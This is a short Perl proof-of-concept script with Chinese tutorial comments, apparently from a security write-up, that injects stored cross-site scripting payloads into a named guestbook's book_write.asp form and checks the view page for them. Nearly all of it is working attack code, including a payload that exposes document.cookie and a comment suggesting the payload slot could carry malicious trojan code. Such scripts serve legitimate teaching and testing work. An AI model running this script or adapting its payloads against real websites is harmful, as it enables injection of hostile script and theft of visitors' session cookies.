lengmonanhai

#下面这行不是注释 是标识Perl程序的文件头 非nix系统下显得就不那么重要了
#!/usr/bin/perl
#下面这行是注释 写明了文件名字和作者
#Freescale Guestbook book_write.asp XSS Proof of Concept By 冰血封情 [E.S.T]
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

#设定使用者的浏览器信息
my $ua = LWP::UserAgent->new();
$ua->agent("XSSInject/v1.1");

#两个不同的跨站测试语句存放在变量xss里 如果挂马也可以写在这里
my @xss = ('><script>alert(window.location);</script>','><script>alert(document.cookie);</script>');
#地址我屏蔽了
my $weburl = "http://www.target.com/guestbook/";

#表单中action提交的页面位置
my $url = "${weburl}book_write.asp";
#提交数据的过程
my $inject;
#用一个循环想该文件的几个要填写的变量提交跨站测试语句
#UserName UserMail等我门之前在图2中查到过
foreach $inject (@xss) {
   my $req = POST $url, [UserName => "EvilOctal",
                         UserMail => $inject,
                         Comments => "EvilOctal",
                         send => "ok"];
   #下面一行取得浏览器反馈信息 是调试时候用的
   my $res = $ua->request($req);        

   #重新定向提交地址到查看留言的页面
   my $urlv = "${weburl}book_view.asp";

   #提交访问查看留言
   my $req = POST $urlv;

   #然后取得该页面的反馈信息 其实就是代码
   my $res = $ua->request($req);
   
   #使用$_当前变量存储返回字符串
   $_ = $res->as_string;
   
   #检查返回字符串中是否已经成功提交了XSS语句
   if (index(lc $_, lc $inject) != -1)
   {
       print "这个页面可能存在跨站脚本执行漏洞：[$url]\n";
   }
}